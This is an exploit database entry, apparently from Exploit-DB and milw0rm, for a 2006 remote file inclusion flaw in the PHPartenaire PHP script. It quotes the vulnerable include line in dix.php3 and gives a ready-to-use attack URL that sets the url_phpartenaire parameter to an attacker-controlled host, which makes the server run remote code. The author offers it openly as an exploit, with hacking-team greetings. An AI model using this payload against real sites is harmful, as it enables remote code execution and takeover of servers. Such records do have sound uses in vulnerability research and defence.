PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit

vendor:

PHPartenaire

by:

DaDIsS

N/A

CVSS

N/A

Remote File Inclusion

N/A

CWE

Product Name: PHPartenaire

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit

The flaw resides in dix.php3 file that contain this code: include($url_phpartenaire."/config.php3");. An example of the exploit is http://www.victime.com/(path)/dix.php3?url_phpartenaire=http://attacker

Mitigation:

N/A

Source

Exploit-DB raw data:

#===================================================================================#
#
# PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : PHPartenaire
# Url : http://ograweb.free.fr/phpartenaire/
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation : 
#
#
# The flaw resides in dix.php3 file that contain this code :
# 
# in line 9 :
#
# include($url_phpartenaire."/config.php3");
#
#===================================================================================#
#
# Example : 
#
#
# http://www.victime.com/(path)/dix.php3?url_phpartenaire=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
#
# DaDIsS / dadiss@virtuaplanet.net
# Proud to be a Moroccan !
#
#===================================================================================#

# milw0rm.com [2006-09-21]